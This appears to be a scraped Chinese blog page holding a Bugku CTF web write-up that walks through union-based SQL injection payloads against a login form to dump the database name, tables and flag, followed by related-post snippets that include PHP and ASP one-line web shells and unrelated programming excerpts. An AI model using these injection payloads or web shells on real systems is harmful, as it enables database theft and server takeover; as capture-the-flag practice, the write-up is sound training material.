BugkuCTF之web題之這是一個神奇的登陸框
BugkuCTF之web題之這是一個神奇的登陸框
開啟網頁之後發現:
隨便輸入賬號和密碼出現:
那就開始尋找注入點吧,輸入0’發現還是:
輸入0" 發現報錯:
確定可以注入,判斷欄位有多少個 0"order by 1,2,3# 發現:
說明有兩列。
輸入 0" union select database(),2# ,得到庫名:
繼續輸入 0" union select table_name,2 from information_schema.tables where table_schema=‘bugkusql1’ # 得到表名:
繼續輸入 0" union select column_name,2 from information_schema.columns where table_name=‘flag1’ #
繼續輸入 0" union select flag1,2 from flag1# 得到該列下的值:
看起來挺像flag的,那麼提交一下吧,發現這個真的是flag!!!
相關推薦
BugkuCTF之web題之這是一個神奇的登陸框
BugkuCTF之web題之這是一個神奇的登陸框 開啟網頁之後發現: 隨便輸入賬號和密碼出現: 那就開始尋找注入點吧,輸入0’發現還是: 輸入0" 發現報錯: 確定可以注入,判斷欄位有多少個 0"order by 1,2,3# 發現: 說明有兩列。 輸入 0" union
BugkuCTF之web題之求getshell
BugkuCTF之web題之求getshell 一進來發現: maybe時繞過,那就用一句話木馬吧!! php的一句話是:<?php @eval($_POST['pass']);?> asp的一句話是:<%eval request ("pass")%> aspx
BugkuCTF之web題之細心
BugkuCTF之web題之細心 一進網頁發現: 這是啥????(黑人問號)一臉的懵逼,檢視原始碼?發現幾個連結欸,點了幾下發現,然並卵。。。發現提示找不到檔案,那好吧,就一個一個來試試,試到robot.txt的時候發現:一般網站都會有robots.txt檔案的,存放可以直接訪問的檔案
BugkuCTF之web題之多次
BugkuCTF之web題之多次 點選進去發現是: 看見有個id,一個一個試一試,到id=5時,發現有提示: 可以確定了,這題是sql注入。 判斷一下是什麼注入,加上單引號出錯,加上#不出錯,加上’ and 1=1#又出錯了,應該是過濾,這時候我們就要判斷一下SQL網站過濾了什麼
BugkuCTF之分析題之中國菜刀
BugkuCTF之分析題之中國菜刀 進入點選下載zip檔案,解壓用wireshark開啟。 搜尋HTTP. 點選第一個http包,選擇複製純文字。 去掉頭尾,在尾部加上==,用BASE64解碼 逐個分析。 看著$D應該是顯示檔案啥的!! 繼續走! 第二個是個顯示的文字,好像
演算法備戰之刷題之計蒜客a+b問題
#include<iostream> #include<stdlib.h> using namespace std; int main() { int t; cin>>t;//輸入的行數 int a;//輸入的第一個數 int b;//輸入的第二個數
CTF之web這道題很簡單
1、輸入【’】報錯,發現注入 2、輸入【and 1=1】正常,輸入【and 1=2】不正常,證明就是SQL注入 3、sqlmap進行SQL注入,這個可以通過linux虛擬機器進行操作,也可以直接在windows作業系統中安裝sqlmap進行操作,這個在我
這是一個神奇的登入框(Bugku-web題 使用sqlmap注入例項)
正在學習sqlmap,拿這個題先入門一下。先看下原始碼:是post提交,url明顯提示是個sql注入,由於post提交,要sql和burp結合起來使用。首先burp抓包,抓到包後選擇存到txt檔案中:(隨便輸入賬號密碼)我儲存到了D盤的1.txt裡。然後開啟sqlmap,輸入
SQL之merge into 批量更新資料 Merge關鍵字是一個神奇的DML關鍵字。它在SQL Server 2008被引入,它能將Insert,Update,Delete簡單的併為一句。M
轉載http://www.cnblogs.com/ruiati/archive/2013/01/18/2866017.html Merge關鍵字是一個神奇的DML關鍵字。它在SQL Server 2008被引入,它能將Insert,Up
Spring Boot學習筆記之使用Spring Boot建立一個簡單的web專案(工具使用IntelliJ IDEA)
新建Maven專案 1.File --> New Project --> Maven --> Next 2.填寫專案資訊,完成之後點選Next,然後點選Finish 3.專案建好之後如下圖所示 修改pom檔案中的配置資訊 <?xml version
web前端之面試送分題
前端入門很容易,簡單地用html搭一個頁面框架;會用一些css基本樣式;懂得用jquery的dom互動,就基本可以挺著胸說自己是個前端工程師了。 但是前端提升異常艱難,演算法、資料結構、oop;javascript、dom、css、html5這些僅僅是標配;效能優化、安全性、程式碼
bugku-Web這是一個神奇的登陸框(sqlmap+bp)
根據url提示是讓sql注入,但萬能密碼又無效,這裡我們用sqlmap+bp來解題。 首先輸入使用者密碼來登入用bp抓包: 如圖將其儲存到txt檔案中,然後用SQLmap來注入 輸入命令暴庫:sqlmap.py -r "1.txt" -p admin_name --
需求分析--我的第一個java-web專案之路(一)
需求分析 (-:引用的定義:-) 所謂”需求分析“,是指對要解決的問題進行詳細的分析,弄清楚問題的要求,包括需要輸入什麼資料,要得到什麼結果,最後應輸出什麼. 需求分析是一個專案的開始,主要是弄明白這個專案需要做什麼,用來做什麼。簡單來說就
C/C++程式設計題之計算一個數字的立方根
計算一個數字的立方根方法:使用對數和指數組合的方法表示立方根。loga(b)表示 以a為底,b的對數,a(m)表示a的m次方。我們知道a(loga(b))等於b,並且nloga(b)等於log以a為底b的n次方。結合這兩個性質,我們可以得到任何一個數的任何一個次冪的值,自然
【暑假學習筆記】之——用Intellij idea新建一個java web+Servlet專案(有例項)——idea中快速重寫父類的方法
Intellij idea中快速重寫父類方法 在寫java檔案時,有時候需要重寫父類方法,但在idea中建立java檔案時並不會像eclipse一樣可以選擇父類,但是重寫父類方法其實只需要這樣做: 滑鼠點選確定程式碼插入位置,使用快捷鍵CTRL+O,就會彈出選擇方法的視窗
原型設計--我的第一個java-web專案之路(二)
原型設計 一`什麼是原型設計? 世界觀: 原型就是一個產品出爐之前樣品的簡單框架,就像建築業製造業的圖紙一樣,起到指導和展示的作用. 這部分工作是由產品經理來規劃. 原型設計就是設計原型的過程
maven學習筆記之IDEA+Maven+Jetty執行一個簡單的web專案
maven學習筆記一、什麼是mavenMaven是一個專案管理工具,它包含了一個專案物件模型 (Project Object Model),一組標準集合,一個專案生命週期(Project Lifecycle),一個依賴管理系統(Dependency Management System),和用來執行定義在生命週
web安全之同源策略
rip 瀏覽器中 屬性。 名單 java get message 否則 cookie 為什麽使用同源策略?一個重要原因就是對cookie的保護,cookie 中存著sessionID 。如果已經登錄網站,同時又去了任意其他網站,該網站有惡意JS代碼。如果沒有同源策略,那麽這
Python3 之 Web 框架:web框架的本質
但是 hub ima sgi 控制器 borde http ace esp 各位,學Python 的同誌,相信對 Django 、Flask、等不會陌生,這些就是Python語言的web 框架。 那麽問題來了,web 服務器又是什麽,他和web框架有什麽關系?他們又是如何工
移動web開發之像素和DPR
javascript element 英語單詞 計算機 web開發 定義 像素,又稱畫素,是圖像顯示的基本單位,譯自英文“pixel”,pix是英語單詞picture的常用簡寫,加上英語單詞“元素”element,就得到pixel,故“像素”表示“圖像元素”之意,有時亦被稱為pel(pi